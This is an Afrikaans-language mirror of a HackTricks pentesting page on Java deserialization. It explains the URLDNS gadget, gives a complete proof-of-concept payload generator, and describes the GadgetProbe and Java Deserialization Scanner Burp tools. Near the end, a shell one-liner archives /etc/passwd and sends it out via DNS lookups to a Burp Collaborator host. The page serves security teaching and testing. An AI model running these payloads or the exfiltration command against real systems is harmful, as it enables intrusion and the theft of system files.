mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
211 lines
11 KiB
Markdown
211 lines
11 KiB
Markdown
# Java DNS Deserialisasie, GadgetProbe en Java Deserialisasie-skandeerder
|
|
|
|
<details>
|
|
|
|
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Ander maniere om HackTricks te ondersteun:
|
|
|
|
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
|
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
|
|
|
</details>
|
|
|
|
## DNS versoek op deserialisasie
|
|
|
|
Die klas `java.net.URL` implementeer `Serializable`, dit beteken dat hierdie klas geserialiseer kan word.
|
|
```java
|
|
public final class URL implements java.io.Serializable {
|
|
```
|
|
Hierdie klas het 'n **merkwaardige gedrag.** Uit die dokumentasie: "**Twee gasheername word as ekwivalent beskou as beide gasheername na dieselfde IP-adresse opgelos kan word**".\
|
|
Dan, elke keer as 'n URL-objek enige van die **funksies `equals`** of **`hashCode`** aanroep, gaan 'n **DNS-versoek** om die IP-adres te kry, **gestuur** word.
|
|
|
|
**Die aanroep** van die funksie **`hashCode`** **van** 'n **URL**-objek is redelik maklik, dit is genoeg om hierdie objek binne 'n `HashMap` in te voeg wat gedeserializeer gaan word. Dit is omdat **aan die einde** van die **`readObject`**-funksie van `HashMap` hierdie kode uitgevoer word:
|
|
```java
|
|
private void readObject(java.io.ObjectInputStream s)
|
|
throws IOException, ClassNotFoundException {
|
|
[ ... ]
|
|
for (int i = 0; i < mappings; i++) {
|
|
[ ... ]
|
|
putVal(hash(key), key, value, false, false);
|
|
}
|
|
```
|
|
Dit is **gaan** die `putVal` **uitvoer** met elke waarde binne die `HashMap`. Maar, meer relevant is die oproep na `hash` met elke waarde. Dit is die kode van die `hash`-funksie:
|
|
```java
|
|
static final int hash(Object key) {
|
|
int h;
|
|
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
|
|
}
|
|
```
|
|
Soos u kan sien, **wanneer** 'n **`HashMap`** gedeserializeer word, gaan die funksie `hash` **uitgevoer word met elke objek** en **tydens** die **uitvoering van** die **`hash`** gaan `.hashCode()` van die objek **uitgevoer word**. Daarom, as u 'n **`HashMap`** gedeserializeer wat 'n **URL** objek bevat, sal die **URL objek** `.hashCode()` **uitvoer**.
|
|
|
|
Nou, laat ons na die kode van `URLObject.hashCode()` kyk:
|
|
```java
|
|
public synchronized int hashCode() {
|
|
if (hashCode != -1)
|
|
return hashCode;
|
|
|
|
hashCode = handler.hashCode(this);
|
|
return hashCode;
|
|
```
|
|
Soos u kan sien, wanneer 'n `URLObject` `.hashCode()` uitvoer, word dit `hashCode(this)` genoem. 'n Voortsetting wat u kan sien is die kode van hierdie funksie:
|
|
```java
|
|
protected int hashCode(URL u) {
|
|
int h = 0;
|
|
|
|
// Generate the protocol part.
|
|
String protocol = u.getProtocol();
|
|
if (protocol != null)
|
|
h += protocol.hashCode();
|
|
|
|
// Generate the host part.
|
|
InetAddress addr = getHostAddress(u);
|
|
[ ... ]
|
|
```
|
|
Jy kan sien dat 'n `getHostAddress` uitgevoer word na die domein, **wat 'n DNS-navraag aanstuur**.
|
|
|
|
Daarom kan hierdie klas **misbruik** word om 'n **DNS-navraag** te **lanceer** om te **demonstreer** dat **deserialisasie** moontlik is, of selfs om inligting te **eksfileer** (jy kan die uitset van 'n opdraguitvoering as subdomein byvoeg).
|
|
|
|
### URLDNS lading kodevoorbeeld
|
|
|
|
Jy kan die [URLDNS lading kode van ysoserial hier vind](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Nietemin, net om dit makliker te maak om te verstaan hoe om dit te kodeer, het ek my eie PoC geskep (gebaseer op dié van ysoserial):
|
|
```java
|
|
import java.io.File;
|
|
import java.io.FileInputStream;
|
|
import java.io.FileOutputStream;
|
|
import java.io.IOException;
|
|
import java.io.ObjectInputStream;
|
|
import java.io.ObjectOutputStream;
|
|
import java.lang.reflect.Field;
|
|
import java.net.InetAddress;
|
|
import java.net.URLConnection;
|
|
import java.net.URLStreamHandler;
|
|
import java.util.HashMap;
|
|
import java.net.URL;
|
|
|
|
public class URLDNS {
|
|
public static void GeneratePayload(Object instance, String file)
|
|
throws Exception {
|
|
//Serialize the constructed payload and write it to the file
|
|
File f = new File(file);
|
|
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
|
|
out.writeObject(instance);
|
|
out.flush();
|
|
out.close();
|
|
}
|
|
public static void payloadTest(String file) throws Exception {
|
|
//Read the written payload and deserialize it
|
|
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
|
|
Object obj = in.readObject();
|
|
System.out.println(obj);
|
|
in.close();
|
|
}
|
|
|
|
public static void main(final String[] args) throws Exception {
|
|
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
|
|
HashMap ht = new HashMap(); // HashMap that will contain the URL
|
|
URLStreamHandler handler = new SilentURLStreamHandler();
|
|
URL u = new URL(null, url, handler); // URL to use as the Key
|
|
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
|
|
|
|
// During the put above, the URL's hashCode is calculated and cached.
|
|
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
|
|
final Field field = u.getClass().getDeclaredField("hashCode");
|
|
field.setAccessible(true);
|
|
field.set(u, -1);
|
|
|
|
//Test the payloads
|
|
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
|
|
}
|
|
}
|
|
|
|
|
|
class SilentURLStreamHandler extends URLStreamHandler {
|
|
|
|
protected URLConnection openConnection(URL u) throws IOException {
|
|
return null;
|
|
}
|
|
|
|
protected synchronized InetAddress getHostAddress(URL u) {
|
|
return null;
|
|
}
|
|
}
|
|
```
|
|
### Meer inligting
|
|
|
|
* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
|
* In die oorspronklike idee is die commons collections-payload verander om 'n DNS-navraag uit te voer, dit was minder betroubaar as die voorgestelde metode, maar hier is die pos: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
|
|
|
## GadgetProbe
|
|
|
|
Jy kan [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) aflaai van die Burp Suite App Store (Extender).
|
|
|
|
**GadgetProbe** sal probeer om uit te vind of sekere **Java-klasse** op die Java-klas van die bediener bestaan sodat jy kan weet **of** dit **kwesbaar** is vir sekere bekende uitbuitings.
|
|
|
|
### Hoe werk dit
|
|
|
|
**GadgetProbe** sal dieselfde **DNS-payload van die vorige afdeling** gebruik, maar **voordat** die DNS-navraag uitgevoer word, sal dit **probeer om 'n willekeurige klas te deserialiseer**. As die **willekeurige klas bestaan**, sal die **DNS-navraag** gestuur word en sal GadgetProbe aanteken dat hierdie klas bestaan. As die **DNS**-versoek **nooit gestuur** word nie, beteken dit dat die **willekeurige klas nie suksesvol gedeserialiseer** is nie, sodat dit óf nie teenwoordig is nie óf nie **serialiseerbaar/uitbuitbaar** is nie.
|
|
|
|
Binne die github, [**het GadgetProbe 'n paar woordlyste**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) met Java-klasse om getoets te word.
|
|
|
|
![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../.gitbook/assets/intruder4 (1) (1).gif>)
|
|
|
|
### Meer Inligting
|
|
|
|
* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
|
|
|
|
## Java Deserialisasie-skandeerder
|
|
|
|
Hierdie skandeerder kan **afgelaai** word van die Burp App Store (**Extender**).\
|
|
Die **uitbreiding** het **passiewe** en aktiewe **vermoëns**.
|
|
|
|
### Passief
|
|
|
|
Standaard **ondersoek** dit passief al die versoek en antwoorde wat gestuur word op soek na **Java-geserializeerde toordraaie** en sal 'n kwesbaarheidswaarskuwing toon as enige gevind word:
|
|
|
|
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (765).png>)
|
|
|
|
### Aktief
|
|
|
|
**Handmatige Toetsing**
|
|
|
|
Jy kan 'n versoek kies, regs klik en `Stuur versoek na DS - Handmatige Toetsing`.\
|
|
Dan, binne die _Deserialisasie-skandeerder Tab_ --> _Handmatige toetsing tab_ kan jy die **invoegpunt** kies. En **begin die toetsing** (Kies die toepaslike aanval afhangende van die gebruikte enkodering).
|
|
|
|
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/3-1.png)
|
|
|
|
Selfs al word dit "Handmatige toetsing" genoem, dit is redelik **geoutomatiseer**. Dit sal outomaties nagaan of die **deserialisasie** kwesbaar is vir **enige ysoserial-payload** deur die biblioteke teenwoordig op die webbediener te ondersoek en sal die kwesbare eenhede beklemtoon. Om te **ondersoek** vir **kwesbare biblioteke** kan jy kies om **Javas Sleeps** te begin, **sleeps** via **CPU**-verbruik, of om **DNS** te gebruik soos voorheen genoem is.
|
|
|
|
**Uitbuiting**
|
|
|
|
Sodra jy 'n kwesbare biblioteek geïdentifiseer het, kan jy die versoek na die _Uitbuiting Tab_ stuur.\
|
|
In hierdie tab moet jy weer die **injeksiepunt** kies, 'n **kwesbare biblioteek** kies waarvoor jy 'n payload wil skep, en die **bevel**. Druk dan net die toepaslike **Aanval**-knoppie.
|
|
|
|
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/4.png)
|
|
|
|
### Java Deserialisasie DNS Exfil-inligting
|
|
|
|
Laat jou payload iets soos die volgende uitvoer:
|
|
```bash
|
|
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
|
|
```
|
|
### Meer Inligting
|
|
|
|
* [https://techblog.mediaservice.net/2017/05/betroubare-ontdekking-en-uitbuiting-van-java-deserialiseringskwesbaarhede/](https://techblog.mediaservice.net/2017/05/betroubare-ontdekking-en-uitbuiting-van-java-deserialiseringskwesbaarhede/)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Leer AWS hak vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Ander maniere om HackTricks te ondersteun:
|
|
|
|
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
|
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
|
|
|
</details>
|